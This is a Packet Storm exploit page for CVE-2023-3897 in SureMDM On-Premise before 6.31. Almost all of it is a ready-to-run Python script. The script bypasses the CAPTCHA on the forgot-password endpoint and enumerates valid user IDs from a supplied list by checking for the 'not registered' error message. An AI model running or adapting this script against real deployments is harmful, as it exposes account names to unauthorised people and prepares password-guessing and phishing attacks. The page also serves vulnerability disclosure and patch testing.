exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SureMDM On-Premise CAPTCHA Bypass / User Enumeration

SureMDM On-Premise CAPTCHA Bypass / User Enumeration
Posted Feb 19, 2024
Authored by Jonas Benjamin Friedli

SureMDM On-Premise versions prior to 6.31 suffer from CAPTCHA bypass and user enumeration vulnerabilities.

tags | exploit, vulnerability, bypass
advisories | CVE-2023-3897
SHA-256 | ee08755ff2c77c77422dc3e6137cfea65ccefc051f98543715278a5b354c366c

SureMDM On-Premise CAPTCHA Bypass / User Enumeration

Change Mirror Download
# Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
# Date: 05/12/2023
# Exploit Author: Jonas Benjamin Friedli
# Vendor Homepage: https://www.42gears.com/products/mobile-device-management/
# Version: <= 6.31
# Tested on: 6.31
# CVE : CVE-2023-3897

import requests
import sys

def print_help():
print("Usage: python script.py [URL] [UserListFile]")
sys.exit(1)


def main():
if len(sys.argv) != 3 or sys.argv[1] == '-h':
print_help()

url, user_list_file = sys.argv[1], sys.argv[2]

try:
with open(user_list_file, 'r') as file:
users = file.read().splitlines()
except FileNotFoundError:
print(f"User list file '{user_list_file}' not found.")
sys.exit(1)

valid_users = []
bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"
enumerate_txt = "This User ID/Email ID is not registered."
for index, user in enumerate(users):
progress = (index + 1) / len(users) * 100
print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r")

data = {"UserId": user}
response = requests.post(
f"{url}{bypass_dir}",
json=data,
headers={"Content-Type": "application/json; charset=utf-8"}
)

if response.status_code == 200:
response_data = response.json()
if enumerate_txt not in response_data.get('d', {}).get('message', ''):
valid_users.append(user)

print("\nFinished processing users.")
print(f"Valid Users Found: {len(valid_users)}")
for user in valid_users:
print(user)

if __name__ == "__main__":
main()

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close